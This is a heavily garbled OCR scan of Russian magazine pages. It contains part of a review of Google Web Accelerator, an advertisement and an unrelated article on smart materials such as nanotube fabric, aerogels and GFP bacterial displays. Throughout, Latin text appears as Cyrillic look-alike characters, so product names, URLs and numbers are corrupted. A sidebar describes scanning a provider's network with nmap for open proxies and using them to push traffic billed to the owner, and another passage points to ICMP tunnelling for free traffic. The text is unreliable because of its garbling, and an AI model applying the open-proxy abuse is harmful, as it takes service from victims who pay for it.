скачкой файлов в РеСеГе. А вот на 051... ой, а вот на 05 1_ 
предвыборка способна кинуть нас на трафик, обув на 
весьма недетские бабки. Ведь никакой гарантии, что мы 
зайдем именно на пред выбранные страницы, у нас нет, а 
платить за них все равно придется. Поэтому пред выборку 
лучше сразу же отключить, но даже при этом 6ѴѴА будет 
отображать ссылки, которые бы он хотел загрузить. И это 
будут не просто ссылки, а наиболее популярные ссылки, на 
которые щелкают все остальные пользователи, — не- 
плохое средство упрощения навигации по неизвестному 
сайту, экономящее не только время, но и трафик. 

5. 6ѴѴА передаеттолько изменения страниц: допустим, 
мы имеем страницу размером в 1 Мб, владелец которой 
неожиданно изменил 1 0 байт в нескольких местах (исправил 
орфографические ошибки, например). В обычной ситуации 
мы были бы вынуждены повторно скачивать весь этот мега- 
байт целиком, а 6ѴѴА позволяет передать лишь изменения, 
то есть по нашему каналу скачается 1 0 байт, плюс накладные 
расходы на организацию передачи. Экономия времени и 
трафика налицо! 

6. Поддержка докачки: при нестабильной связи и частных 
разрывах, серверы, не поддерживающие докачку, становят- 
ся настоящим исчадием ада, но... только не с ѲѴѴА, который 
заглатывает файл внутрь себя и затем отдает нам. С докач- 
кой! Экономя и время, итрафик! 

7. Сжатие ѵѵеЬ-содержимого: подавляющее большинство 
современных ѵѵеЬ-серверов и браузеров поддерживают 
сжатие текстовых ѵѵеЬ-страничек в формате дгір, эко- 
номя и скорость, итрафик, однако до сих пор находятся 
серверы, не поддерживающие этот режим, и воттут-то ѲѴѴА 
оказывает нам существенную помощь. Правда, учитывая 
незначительную долю таких серверов, много сэкономить не 
получается. 



□ Оптимальная настройка 

Щелкаем по часам, в появившемся меню выбираем 
«Ргеіюгепсез» (или набираем в адресной строке Горящего 
Лиса/ІЕ следующий С1ВЕ: ЫірУ/1 27.0.0.1 :91 ОО/ргебегепсез ). 
после чего получаем доступ ко всем настройкам. 

□ Кактехнически устроен ОѴѴА 

Технически ѲѴѴА представляет собой расщепленный 
ргоху-сервер, одна половина которого работает на сервере 
зЬ.доодІе.сот . другая же устанавливается локально и 
открывает порте номером 9100, через который работает ІЕ, 
Еігеіох и любая другая программа. Для следующих экспери- 
ментов нам потребуется собственный ѵѵеЬ-сервер, ведущий 
подробные логи (рекомендуем бесплатный для граждан 
России зтаІІ-Ыф, который можно скачать с ѵѵѵѵѵѵ.зтаіізіл/.сот ). 
любой достойный ТСР/ІР-битрег и персональный бранд- 
мауэр (я использую ЭуѲаіе Регзопаі Рігеѵѵаіі — брандмауэр 
и ТСР/ІР-битрег в одном флаконе; до версии 4.2 он был 
бесплатен, а теперьтребует регистрации). Также приго- 
дится любая утилита для мониторинга открытых портов: от 
стандартной пеізіаі, запущенной с ключом «-а», до ТСРѴіеѵѵ 
Марка Руссиновича ( ѵѵѵѵѵѵ.зѵзіпіегпаіз.сот ). 

Собрав все инструменты, необходимые для вскрытия, захо- 
дим в каталог\Ргодгат ЕіІез\СоодІе\ѴѴеЬ Ассеіегаіог и видим 
там два файла. Первый — СоодІеѴѴеЬАссСІіепі.ехе — это 
сердце акселератора, представляющее собой локальный 
ргоху-сервер с открытым 9100-м портом для общения с брау- 
зером, взаимодействующий с удаленным СѴѴА ргоху- 
сервером зб.доодіе.сот по стандартному 80-му порту. 

Второй файл — СоодІеѴѴеЬАссѴѴагбеп.ехе — реализует«спидо- 
метр» в системномтрее и на панели управления, общающийся с 
СоодІеѴѴеЬАссСІіепЕехе через средства межпроцессорного вза- 
имодействия, а конкретно — через зоскеі'ы. Если снести этотпро- 
цесс (в «Диспетчере задач» или ЕАР'е), «спидометр»тугже исчез- 
нет, но акселератор продолжит работать с ничуть не меньшим 
усердием. Кстати говоря, СоодІеѴѴеЬАссѴѴагбеп.ехе является 
пусковым файлом, и если его остановить, а потом запустить 
повторно, то мы получим две копии СоодІеѴѴеЬАссСІіепЕехе, 

ведущие себя доволь- 
но непредсказуемым 
образом. 

Теперь ненадолго от- 
ключим СѴѴА и зайдем 
на свой собственный 
Шр-сервер, роль 
которого в данном 
случае исполняет 
ШрУ/пегиті.огд.ги . 
недавно переведен- 
ный в орбитальный 



Серьезный конкурент Соодіе'а! 

Главным, можно даже сказать, фундаментальным недостатком СѴѴАявляется его органичес- 
кая неспособность сжимать графические изображения, а ведь именно на них приходится 
львиная доля сетевого трафика. Коммерческий акселератор ѵѵѵѵѵѵ.ргореі.сот разработал 
специальный алгоритм сжатия, позволяющий уменьшать размер )ред-файлов (которые, как 
известно, практически не поддаются сжатию) в 1 5 раз, сохраняя при этом приемлемый уро- 
вень качества (то есть можно смотреть без содроганий, поскольку изображение остается субъ- 
ективно приятным). Акселератор поддерживает практически все существующие на данный 
моментбраузеры (ІЕ, ІМеізсаре, Орега, Могіііа и Еігеіох) и даже дает7 дней пробного доступа! 




> ѵѵеЬассеІегаіог. 
доодіе.сот — глав- 
ная страница Ѳоодіе 
ѴѴеЬ Ассеіегаіог; 
ѵѵѵѵѵѵ.сз.иіЕпо/ 
-бапіеІз/РіпдТиппеІ 
— отом, как получить 
бесплатный 
трафикза счет 
ІСМР-тоннеля. 



Ш 

> Специально для тебя 
мы сняли видеоуроки 
по использованию 
ѲѴѴА, сканированию 
сети провайдера на 
наличие открытых 
прокси-серверов, а 
также организации 
ІСМР-тоннеля. 
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> Весьупомянутый в 
статье софт, а также 
другие акселераторы 
ты найдешь на нашем 
0Ѵ0. В папке с файла- 
ми та кже л ежат логи 
ѵѵеЬ-сервера, для того 
чтобы ты смог оценить 
запросы браузера, 
использующего аксе- 
лератор от Ѳоодіе. 
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Бесплатный &ЗІ_: один из способов 

Инсталлируя ѲѴѴАна своем компьютере, мы тем самым устанавливаем локальный ргоху- 
сервер и открываем 9100-й порт, необходимый для его работы. Сразуже возникает вопрос: 
а как насчет безопасности?! Вдруг какой-нибудь умни к пропишет наш ІР и 9100-й порт в 
свойствах своего браузера и будет гнать через настрафик, за который нам придется платить? 
Атаки такого типа очень широко распространены и встречаются повсеместно. Как правило, 
внутрисетевой трафик (трафик внутри сети провайдера) стоит ощутимо дешевле внешнего 
или вообще нетарифицируется! 

В это же самое время многие клиенты уста на вливают у себя ргоху-серверы, обслуживающие 
сеть организации или дажедомашнюю локалку. Грамотный администратор первым делом со- 
ставляетсписокразрешенных ІР (принадлежащих, естественно, его локалке) или указывает, 
с каких сетевых интерфейсов разрешен доступ. Однако если администратор — лох, то сервер 
остается открытым для всехжелающих! Обнаружив жертву простым сканированием (в любом 
сканере типа п тар задаем диапазон ІР своего провайдера и ищем машины с открытым 
3128-м или 8080-м портом), халявщик указывает найденный ІР в адресе ргоху-сервера своего 
браузера и начинает гнать трафик, оплачиваемый из чужого кармана. Естественно, скрыть 
свой I Рему не удается, и дело обычно заканчивается мордобоем. Правда, в случае действи- 
тельно крупных провайдеров, локалка которых покрывает целый край (например, Красно- 
дарский), пионер можеттерриториально находиться за сотни километров, что затрудняет 
процедуру разборки. 

А как обстоят дел а с безопасностью ѲѴѴА? Анализ показывает, что он разрешает доступ только 
садреса 127. 0.0.1, то есть непосредственно с самой локальной машины, и блокирует попытки 
подключения извне. Правда, насколько надежно он это делает и не содержится ли в нем оши- 
бок переполнения, неизвестно, поэтому заткнуть порт91 00 на персональном брандмауэре 
будетнелишне. Кстати говоря, какой идиот-разработчик придумал такие ограничения?! Нор- 
мально настроенный акселератор должен допускать к себе остальных членов локальной сети, 
если администратор этого хочет, он ведь неспроста этого хочет! Локальный кэш — великое 
дело, особенно если разныеузлы обращаются кодним итемже серверам, какчаще всего 
и бывает. Даже в домашней сети простейший кэширующий прокси (вроде уже упомянутого 
зтаІІ-Ыір) экономиттрафика больше, чем ѲѴѴА! Еще одна проблема, связанная с ѲѴѴА, — к 
нему могут обращаться любые программы (а не только браузер), в том числе и зловредные 
утилиты, ворующие информацию с компьютера и скрытно передающие ее через сеть. В обыч- 
ной ситуации их остановит брандмауэр, но в случае с ѲѴѴА — нет. 



режим, то есть запущенный на круглосуточную 
работу. В лог-файле немедленно появляется 
следующая запись, представляющая за- 
прос «ѲЕТ/ НТТР/1 .1 », посланный Рігебох и 
предписывающий серверу возвратить главную 
страницу. 

Атеперьзапустим ѲѴѴА и попробуем зайти на 
сервер еще раз. Я даже не хочу при водить то 
безобразие, которое отобразилось в логах моего 
ѵѵеЬ-сервера! Во-первых, теперьзапросы идут 
не оттого узла, где установлен Лис, а совсем 
из другого места — 72.14.1 92.1 . Этим местом, 
как нетрудно догадаться, является один из 
серверов, входящих в распределенную сеть 
ѲѴѴА, и его мы можем использовать как ргоху. 
Воттолько... скрытьсвой истинный ІР все равно 
не получится, поскольку ѲѴѴА явно пропи- 
сываетего в заголовке: «Х-ЕогѵѵагсІесІ-Еог: 
83.239.33.46», также указывается подлинная 
строка идентификации браузера вместе с 
остальными параметрами. 

Во-вторых, один и тотже запрос «ѲЕТ / НТТР/1 .1 » 
выполняется дважды — один раз для Горящего 
Лиса, второй — для удаленного кэш-сервера 
ѲѴѴА. Таким образом, интенсивное использова- 
ние ѲѴѴАмногими миллионами пользователей 
приводит к повышенной загрузке ѵѵеЬ-серверов 
по всему миру. Радужная вырисовывается перс- 
пектива, не правда ли?! 

В-третьих, при активной предвыборке, ѲѴѴА 
тут же начинает загружать к_Ьі1:ееѵ раск.гі р 



Как прикрутить СУА к Опере? 

Официально ѲѴѴА поддерживаеттолько 
браузеры Еіге^ох и ІЕ, но при желании его 
можно заставить работать с любой другой 
программой, например с Оперой. Ведь в 
основе ѲѴѴАлежитлокальный ргоху-сер- 
вер, а всякиетам «спидометры» на панели 
инструментов сделаны исключительно 
ради красоты. 

Короче, берем Оперу (любой версии), 
заходим в меню «Тооіз», выбираем пункт 
«Ргеіюгепсез» (или нажимаем <СТРЕ- 
Е12>). В открывшемся диалоговом окне пе- 
реходим к вкладке «АбѵапсесІ», щелкаем по 
строке «пеіѵѵогк», давим на кнопку «ргоху 
зегѵегз» и в строке НТТР пишем: «1 27.0.0.1 , 
рогі; 9 1 00», незабыв взвести напротив него 
галочку. Также можно задействовать «НТТР 
1.1 Ьг ргоху», а вот НТТР5 проксировать 
не надо, все равно ѲѴѴА (по соображени- 
ям секретности) не поддерживает этот 
протокол. 

V V 



(сборник из 96 статей), а он весит почти 37 Мб. 
Обрати внимание на нестандартное поле «X- 
ГТЮ 2 : ргеІюІхЬ» в заголовке НТТР-запроса. И вся 
эта информация насильно впихивается зашед- 
шему на сервер пользователю, не дожидаясь, 
пока он сделает запрос!!! А по широкому 051- 
каналу мегабайты пролетают очень быстро... 
Предвыборка — это понятно. Непонятно 
другое. Каки почему ѲѴѴА выбрал именно 
эти два архива из более чем 80-ти остальных 
файлов, валяющихся на сервере?! Да очень 
просто! По критерию популярности. Заклад- 
ки, встроенные в Горящего Лиса и Оперу, 
нашептали ѲѴѴА, что именно качают пользо- 
ватели с мыщъх'иного сервера чаще всего, и 
мыщъх’иные логи эту информацию полностью 
подтверждают!!! 

Таким образом, при использовании предвыбор- 
ки трафикувеличивается во много раз, посколь- 
ку вовсе не факт, что скачанная информация 
будетзатребована пользователем. Поэтому 
предвыборку лучше всего отключать: прирост 
скорости намного меньше прироста оплаты за 
мегабайты. На безлимитныхтарифах, конечно, 
картина несколько другая, но и там предвы- 
борка нагружает канал, забивая его фоновым 
соединением. 

Независимо отактивности предвыборки, ѲѴѴА 
сохраняет считанные страницы в кэш-папке 



Горящего Лиса или ІЕ, то есть работает как 
обычный кэш-ргоху сервер, только не простой, 
а кривой. Лучше бы он сохранял их в отдельной 
папке, тогда при просмотре одних и техже стра- 
ниц из-под разных браузеров мы бы экономили 
на трафике. 

Еще один факт, скорее относящийся к 
области курьезов, но все-таки достаточно 
интересный сам по себе и достойный описа- 
ния. Сразу же после установки ѲѴѴА, на узел 
сервера обрушилось большое количество 
ІЮР-пакетов, направленных на 1030-й порт 
(сервис обмена сообщениями), отсекаемых 
брандмауэром, но нервирующих своим рек- 
ламным содержимым при просмотре логов. 
Ктомуже, несмотря на все блокировки, это 
входящий трафик, за который приходится 
платить. 

□ Заключение 

И все-таки — стоит использовать ѲѴѴА или нет? 
Вопрос не имеет однозначного ответа. Отом, что 
ѲѴѴА представляет собой лучший бесплатный 
акселератор, никто не спорит и спорить не со- 
бирается, но по сравнению с коммерческими он 
пока отдыхает. Тотже ѵѵѵѵѵѵ.ргореі.сот позволя- 
етэкономить гораздо больше мегабайт, правда 
ценой потери качества картинок, которое в 
некоторых случаях важнее денег.ЗИ 
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Кеасіу, Зіеасіу, Ѵізіа™ 



Стильные и надёжные материнские платы 
Рохсопп применяются а миллионах персо- 
нальных компьютеров по всему миру. Исполь- 
зуя современные компоненты совместно с 
материнскими платами Ѵініа™ Реагіу от 
Рохсопп, вы создадите решение, поддержи- 
вающее новейшую операционную систему от 
МісгозоТС/ 
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Ю РИЙ С ВИДИНЕНКОІ 



МАТЕРИЯ 
НА ПРЕДЕЛЕ 
ВОЗМОЖНОСТЕЙ 



ВСЕ ОБ «УМНЫХ» МАТЕРИАЛАХ 



Интеллектуальная среда обитания — вот чего не хватает человеку XXI века. Всеобщая 
информатизация, на самом деле, не всеобща. Хочется, чтобы под каждым камнем была 
розетка 220 В, а ѴѴі-Рі доступ в интернет не пропадал даже в стратосфере. И это уже не 
кажется фантастикой, просто нужно немного подождать. Ничего качественно нового 
такие изменения нам не принесут. Но в том-то и дело, что технологии развиваются не 
только количественно, но и качественно, но об этом принято традиционно забывать в 
футурологических прогнозах на ближайшее будущее . . . 
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> Такая вот хитрая штука 



О Материалы Хігете 

Человечество с давних пор делает нужные 
материалы под себя, правда раньше они чаще 
всего «не отличалисьумом и сообразитель- 
ностью». Да и не нужно это было тогда. Сегодня 
некоторые виды материалов тоже совсем не 
обязаны характеризоваться большим количест- 
вом транзисторов или экспресс ДНК-анализом. 
Взятьхотя бы обычный канат — с развитиемтех- 
нологий он должен быть легче, жестче и вроде 
бы все. Можно, конечно, сделать индикацию на 
разрыв, показывающую, сколько он еще выдер- 
жит, но это напрямую не касается его основного 
предназначения. 

«Наращивание мускулов» известных нам 
материалов в наш век дойдет почти до предела. 
И в этом нет ничего фантастического, поскольку 
физика твердого тела в прошлом веке заложила 
теоретические основы для создания ибег-ма- 
териалов, а сегодня нанотехнологии начинают 
воплощать теорию в жизнь. 

Ты, наверняка, слышал о нанотрубках. Но, 
я думаю, ты удивишься, если узнаешь, что 
средневековые мастера использовали их 
для создания знаменитой дамасской стали, 
секрет производства которой был долгое время 
неизвестен. Это была лучшая оружейная сталь: 
прочная и при этом достаточно гибкая. 

Но недавно немецкий ученый Петер Пауфлер 
догадался посмотреть на дамасский кинжал под 
электронным микроскопом и увидел в составе 
стали... обычные нанотрубки! Но люди получают 
ихтолько последние 10 лет, а возраст кинжа- 
ла был порядочным. Как же могли древние 
оружейники сделать настолько высокотехноло- 
гичный материал, который мы пока получить не 
можем, даже зная, какой «устроен»? 

Ученые полагают, что при ковке стали некото- 
рые примеси в ней вызывали ростуглеродных 
нанотрубок(примеси были достаточно простыми 
— это сгорающее дерево и листья для растопки 
кузни). Потом нанотрубки наполнялись карбидом 
железа, формируя из него тончайшие нити. Хотя 
звучит это просто, но получитьтаким же способом 
дамасскую сталь Пауфлеру пока не удалось. 

Зато ученым из США и Австралии удалось 
сотворить из нанотрубоктакое, что оружейни- 
кам древности даже и не снилось. Они сделали 




> «Электронная пряжа» 



прозрачную ткань, состоящую из нанотрубок, 
длиной 1 (!) метр и шириной 5 сантиметров. 
Ранее ученые получали нанотрубки длиной 
только в несколько сантиметров. Крометого, 
эта лента обладает высокой прочностью и 
может превратиться в гибкий сверхтвердый 
ОБЕО-экран, если снабдить еетранзисторами и 
светодиодами. 

Эту наноткань может иметь самое разное при- 
менение: и в строительных материалах, и в сна- 
ряжении, и даже для изготовления бронежиле- 
тов... Ткань из нанотрубок может использоваться 
даже в освещении, заменяя лампы дневного 
света и обычные лампочки. 

Наноткань — это, конечно, не массив «цельных» 
нанотрубок, а композит, состоящий из перепле- 
тенного леса многослойных нанотрубокдлиной 
245 микрон и диаметром 1 0 нанометров. 

Чтобы ты понял, насколько прочна наноткань, 
вот некоторые цифры: прочность пленки 

— 175 МПа/(г/см 3 ); прочность полимерных 
пленокмайлар и каптон, использующихся в 
сверхлегких самолетах, — 1 60 МПа/(г/см^), 
а закаленной стали — 1 25 МПа/(г/см^). 
Благодаря наноткани запуск коммерческого 
космического лифта в 2018 году не кажется 
фантастической затеей. 

Другой подход к суперматериалам предла- 
гаетфирма 11.5. ѲІоЬаІ Ыапозрасе Іпс. Она 
производиттонкий материал, сотканный из 
пластиковых волокон, — прочное защитное 
покрытиедля военной техники, позволяющее 
на полов и ну уменьшить вес и в 2 раза увеличить 
прочность, к примеру, брони танков. 

Используя давно знакомый принцип комбини- 
рования хорошо работающихтехнологий, ин- 
женеры получают материалы с экстремальными 
характеристиками. Не секрет, что воздух — пло- 
хой проводниктепла. Известнотакже, что чем 
больше воздушных прослоек в материале, тем 
теплоизоляция лучше. Это проверяется просто 

— достаточно надеть 5 рубашек одну на другую, 
чтобы почувствовать, чтотаконо и есть :). Если 
теперь взять воздух и максимально «компакти- 
ровать» его в материале, можно получить почти 
идеальный теплоизолятор. 

Это попытались сделать спецы из компании 
Азреп. Они разработали утеплительный 




> Полупроводниковый конический фотон- 
ный канал в качестве квантовой точки 



материал на основе полимеров с нанопорами и 
назвали его Азреп’з Ругодеі АР5401 . Благодаря 
нанопорам, содержащим воздух, материал 
ведет себя какхороший теплоизолятор. 

В марте 2004 года Азреп Аегодеіз начала 
производство утепляющих стелек для обуви из 
разработанного ей материала. Новый утеплитель 
заказывали: команда, выигравшая в 2004 году 
марафон к Северному полюсу, канадскиелыж- 
ники и элитное спецподразделение армии США. 
Отзывы о продукте были схожи — это универсаль- 
ное решение для экстремальных условий. 
Аэрогель сохраняеттепло лучше, чем все 
существующие современные аналоги! По срав- 
нению с ними.тепловыехарактеристики нового 
материала при одинаковойтолщине образцов 
улучшились в 3-20 раз. В армейской обуви слой 
стелек из Ругодеі АР5401 составляет 2,5 мм в 
толщину. Компания-дилер новых стелек в США 
НоіЬесІз продает их всего по $1 9,99 за пару. 

ООідіІаІІіГе 

Другой, довольно логичный способ создания 
«умных» материалов — внедрение в существу- 
ющие материалы электроники. Но электроники 
не обычной, потому что обычная электроника 
довольно капризна: боится перепада темпера- 
тур, непрозрачна, хрупка. Одно дело — вшить в 
рубашку или штаны РЕЮ-чип со своим именем, 
чтобы враги не сперли, а другое — заставить 
эту рубашку показать видеоклип. Если первое 
можно было сделать уже вчера, то второе — и 
сегодня достаточно непросто. 

Но все же рубашки-дисплеи и другая «умная» 
одежда уже существует. Более того, микроэлек- 
троника проникает нетолько в текстиль и пов- 
седневную одежду, но и в обувь — ты, наверняка, 
слышал про іРоб-кроссовки. 

И я думаю, чтоутебя нетсомнений втом, что 
в ближайшем будущем мы все будем носить 
«умную» одежду. Любимые примеры футуро- 
логов — такие как платья, изменяющие цвет 
взависимости от настроения хозяйки, белье, 
которое следит за состоянием здоровья, пальто 
со встроенным прогнозом погоды — кажутся уже 
не каким-то «прекрасным далеким», а, скорее, 
будничным завтра. Одежда давно представля- 
ет собой посредника в общении между людьми, 
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> Эластомер эластан 



> Светящиеся электрические бактерии СеоЬасІег 



теперьже этот посредник может даже активно 
в нем участвовать. Так, недавно компания 
Ргапсе Теіесот представила беспроводные 
дисплеи, которые, если поместить их на рукаве, 
отображаютэмоции хозяина. Компания также 




БИОЭЛЕКТРОННАЯ СЕТЧАТКА 



Профессору Николасу Котову из медицин- 
ского отделения Техасского университета и 
его коллегам удалось создать первый в мире 
нейроинтерфейс, связывающий нейроны с 
пленками, содержащими фотоэлементы. Как 
говорят исследователи, это позволит в буду- 
щем сконструировать искусственную сетчатку 
глаза. Основа искусственной сетчатки —тон- 
кая пленка, состоящая из двух слоев: слоя 
наночастицтеллурида ртути и положительно 
заряженного слоя полимера РОБА. Оба слоя 
ученые соединили с помощью специального 
клея и нанесли на поверхность получившего- 
ся бутерброда биосовместимое аминокислот- 
ное покрытие, чтобы нервные клетки могли 
без проблем взаимодействовать с пленкой. 
Эта искусственная сетчатка, созданная на 
базе открытия ученых, сможет даже воспро- 
изводить цветовую насыщенность объектов 
слепым людям, не говоря уже о высоком 
разрешении изображения. Напомню, что 
на сегодняшний день протезы сетчатки в 
лучшем случае позволяют видеть черно- 
белое изображение с разрешением 100x100 
точек и связаны целой системой проводной 
поддержки с внешней камерой, крепящейся к 
дужке специальных очков, которые необходи- 
мо носить для работы устройства. 



разработала ряд гибких дисплеев, которые 
могут использоваться какзаписные книжки 
и будут вшиты в карманы одежды. Дисплеи 
представляют собой компьютер, который может 
связываться с персональным компьютером для 
передачи данных. 

В видеопрезентации новой технологии 
Соттипісаііпд Сіоібез молодая женщина 
смеется, и сердце, нашитое на ее одежду, 
пульсирует красным цветом. По сравнению 
стем, что было представлено компанией в 
началетретьего тысячелетия, прогресс налицо: 
БЕй-дисплеи стали тоньше, легче и подде- 
рживают Віиеіооіб-технологию. Но главная 
революционная идея — передача изображения 
с нашивки на одежде в виде ттв на мобильный 
телефон. Выпуск коммерческого продукта на 
основе «эмоциональных наклеек» планируется 
в этом году. 

Продукция Ргапсе Теіесот пригодна для того, 
чтобы носить ее какаксессуар, а исследователь 
из Массачусетского технологического универ- 
ситета Мэгги Орт пытается сделать предмет 
одежды (футболку или вечернее платье), пол- 
ностью состоящий из дисплеев. Ее компания 
Іпіегпаііопаі ЕавЫоп МасЫпев производит 
ткань, которая не содержит никаких дисплеев, 
а является дисплеем сама. Запатентованная 
Мэгги «электронная пряжа» представляет со- 
бой набор проводящих и непроводящих нитей, 
покрытых чернилами, изменяющими цветв 
зависимости оттемпературы нитей. 

Нагрев нитей, вызванный протеканием по ним 
электрического тока, заставляет чернила изме- 
нять цвет, и нанесенный ранее шаблон (в виде 
конфигурации нитей) начинает проявляться на 
ткани. Для нагрева нитей используется низкое 
напряжение, поэтомутакая одежда безопасна. 
Мэгги утверждает, что через год технологии 
«электронной пряжи» совместно стехнологией 
«сенсора из ткани» будут использоваться в 
целом ряде продуктов: отбольших экранов, 
вмонтированных в ковры, до ламп, изменяющих 
цвет от прикосновения. 

Почему Мэгги не предлагает использовать эти 



технологии в одежде? Для работы «электронной 
пряже» необходимо столько же электроэнергии, 
сколько потребляетобычная лампочка нака- 
ливания. Поэтому пока одежду из нее можно 
носитьдома, где всегда можно подзарядиться. 
Однако специалисты утверждают, в составе 
«электронной пряжи» возможно применение 
новых электрохромных чернил. Одежда на их 
основе будет потреблять меньше энергии. 

Одна из любимых идей киберкутюрье — созда- 
ние одежды, предсказывающей погоду. Плащ, 
оснащенный дисплеем, будет изменять цвет в 
зависимости оттого, какая ожидается погода. 

И если прогноз неблагоприятен, хозяину стоит 
сходить домой за зонтом. Узнавать погоду плащ 
сможет по интернету с помощью беспроводных 
технологий. 

Другое направление — биометрическая одеж- 
да. Интегрировав в обычноетрико, которым 
часто пользуются спортсмены, гибкий дисплей, 
набор сенсоров для детекции вредных веществ, 
микроскопическийтопливный элемент, микро- 
насосы и п р. , мы получим готовую диагности- 
ческую лабораторию, которая будет отображать, 
например, состояние спортсменов в процессе 
соревнований. Неудивительно, что такая наво- 
роченная майка предназначается пока только 
для военного применения. 

Исследователи из другой группы университета 
Беркли в США заняты еще одной проблемой 
одежды нового тысячелетия. Это проблема 
хранения и передачи данных от одежды к 
персональным компьютерам еехозяев. Пока 
иссл едовател и додумал ись тол ько до матри цы 
транзисторов, которые будут составлять ткань 
одежды. При необходимости эти матрицы смогут 
организовываться в структуры хранения или 
передачи данных. Таким образом, одежда будет 
представлять собой целую компьютерную сеть, 
которая сможетлегко взаимодействовать с 
локальными сетями и интернетом с помощью 
беспроводных технологий. 

Исследователи использовали новый подход 
для интеграции транзисторов в ткань. Они 
изготовили ряд тонких алюминиевых нитей, 
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покрытых специальным материалом, затем 
совместили несколько слоев хлопка и матрицы 
нитей, получивткань, состоящую из миллиона 
транзисторов. Правда, для массового выпуска 
такой одежды необходимо разработатьдеше- 
вый способ ее производства. 

О Биомассу — в массы! 

Если же ты думаешь, что будущее, тесно связан- 
ное с электроникой и квантами, — это скучно, то 
добро пожаловать в мир цифровыхорганизмов! 
Электронные «умные» материалы пока не могут 
сравниться с вычислительным потенциалом 
простой бактерии. Да и это неудивительно, 
ведь пока проблематично даже смоделировать 
бактерию, не говоря уже о том, чтобы создать ее 
искусственно. Но, как ни крути, живые организмы 
могут пригодиться в различных интерфейсах 
между человеком и машинами, таккакмы стобой 
тоже пока состоим из органики. 

Уже известно, что связать живое с неживым 
можно и сделать это довольно несложно. 
Правда, нужно время, для того чтобы довести 
технологии био- и нейроинтерфейсы до ума, но 



это не составляетнеразрешимой проблемы. 

Ну а пока ученые могутпохвастатьсяживыми дис- 
плеями, пиксели в которых состоят из бактерий! 
Электронный дисплей, который показывает 
портрет девушки, на самом деле составлен из 
генетически измененных микроорганизмов, 
культивируемых втысячах чашек Петри. Бак- 
терии, предстающиеживой цифрой, светятся, 
живут и умирают в процессе его работы. 

Новая разновидность бактерий-пикселей 
появилась как побочный продукт молекулярных 
биологических исследований: светящиеся 
зеленым мыши, рыбы, растения и бактерии. Жи- 
вой дисплей — один из примеров генетической 
модификации на основе зеленого флуоресциру- 
ющего белка (дгееп Ріюгезсепсе ргоіеіп — 6РР). 
6РР — это единственный известный белоксо 
свойствами флуоресценции, вызванной частью 
самого белка. Одним из самых важных направле- 
ний использования ѲРР в молекулярных науках 
стало его применение в качестве маркера: белок 
присоединяется кспецифическому гену, который 
должен быть исследован, и действует как молеку- 
лярная лампа, подсвечивая нужный ген. 



Кроме применения ОРР в медицине, у генетиков 
сложилась «модная научная тенденция», 
положившая начало созданию в лабораториях 
по всему миру целого зверинца из существ, 
которых обыватели считают причудливыми. Это 
и мыши сзеленой флуоресценцией в гландах, и 
лягушки, которые могут отложить зеленую икру, 
и мухи со светящимися полосками на брюхе, и 
животные сзелеными глазами, частями кожи, 
ушей или лап. Дисплей 6 РРіхеІ является пря- 
мым продолжением этих«модных» исследова- 
ний. Правда, в этом случае мода уступает место 
целесообразности — ведь дисплей для работы 
не требует электроэнергии! 

Устроен ОРРіхеІ достаточно просто: часть бак- 
терий Е. соІІ, находящихся в 2600 контейнерах 
из плексигласа в пределах портрета, благо- 
даря модификации получила 6РР и испускает 
зеленый свет. При комнатной температуре 
вся установка 6РРіхеІживет4-6 недель. В 
итоге перед тобой дисплей-картина, в которой 
объединены две интересные вещи: пиксель на 
основе информационных технологий и живое 
существо в качестве создающего изображение 
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материала. Правда, для создания полноценного 
рабочего дисплея все же потребуется электри- 
чество. Но и это не является большой проблемой. 
Ты ведьзнаешь, что существуютживотные, 
которые с ним на «ты»: это электрические скаты 
и электрическиеугри. Почему бы и бактериям 
тоже не «наэлектризоваться»? Так будет проще 
интегрировать их в обычную электронику, притом 
обеспечивая возможность контакта сживыми 
организмами. И какследствие — в будущем могут 
появиться «умные»живые материалы, которые 
будутвосстанавливатьповрежденныеткани или 
лечить насот гриппа, предварительно проверив 
по интернетутоп популярных антител против 
него. Это станет возможным благодаря недав- 
нему исследованиюученых из Массачусетского 
технологического университета. Оказалось, 
что можно модифицировать гены бактерии 
беобасіегзиііиггесіисепз, чтобы у нее на повер- 
хности образовалисьэлектропроводные нарос- 
ты — фимбрии. Причем на одной бактерии их 
может находиться до несколькихтысяч. Они 
состоят из гидрофобного белка и не прово- 
дятэлектричества. Но, спецы университета 



ИСКУССТВЕННАЯ КРОВЬ 

Шведскиеученые из института Кагоііпзка 
впервыеуспешно использовали искусствен- 
ную кровь. В отличие от настоящей крови, 
имеющей срокгодности всего42 дня, порошок 
на ее основе может храниться втечение не- 
скольких лет. Когда необходимо, порошок ис- 
кусственной крови приобретаетжидкую форму 
и может немедленно использоваться, что 
особенно ценно, независимоот группы крови 
пациента. Для создания порошка ученые 
используют человеческие кровяные тельца, 
но делают это, скорее, по этическим причинам. 
Производствозаменителя вполне возможно 
из крови млекопитающих вроде коровы. 

По словам доктора Пьера, если мировое 
здравоохранение одобрит искусственную 
кровь, человечество сделаеттакой же шаг 
вперед, каким была высадка на Луне. 



утверждают, что если беоЬасіегвиІішггесІисепз 
выращивать на питательных средах с высоким 
содержанием оксида железа, то фимбрии 
станутэлектропроводными и бактерии можно 
будет использовать для производства биологи- 
ческих нанопроводников 

Ойідііаі Огеат 

Как видишь, существует много вариантов 
«умных» материалов. Однако есть еще один 
радикальный метод, благодаря которому «мате- 
риальный вопрос» может решиться человечес- 
твом раз и навсегда. Причем изменится все не 
количественно, а качественно. Представь себе 
кусок вещества, который может по твоему же- 
ланию менять свою структуру: захотел — и это 
стекло, захотел — кусокжелеза. Или, скажем, 
тутже кусок превращается в мощный компью- 
тер. Или — в кусок плоти. И это не фантастика 
или магия. Этозакономерное следствие 
развития материаловедения и физики твердого 
тела. Теперь человечество может диктовать 
материи свои условия, и она на эти условия 
охотно согласится. Нодлятого чтобыты понял, 

>Атомы-троянцы 



о чем идет речь, нужно вспомнить историю. Ты 
наверняка слышал легенду о троянском коне. 

Не о том, как древние греки троянами положили 
все серверы троянцев :], а о пустотелой модели 
большого коня, в котором сидели воины, ворвав- 
шиеся ночью в неподготовленную к внутренней 
атакеТрою. Примернотакже мы поступим с 
материей. Как известно, атомы — основные 
составляющие бытия со своими уникальными 
квантово-механическими свойствами, поэтому 
если вместо атомов поставить«наших людей», 
меняющих свои квантовые свойства по нашему 
желанию, то получится универсальный пласти- 
лин, из которого можно лепить все что угодно. 
Теперь подробнее. Основа «троянского плас- 
тилина» — квантовая точка. Это электронное 
устройство, способное захватывать электроны 
и удерживать их в очень малом пространстве. 
Электроны при этом ведут себя как отдельные 
стоячие волны, также какони ведут себя в 
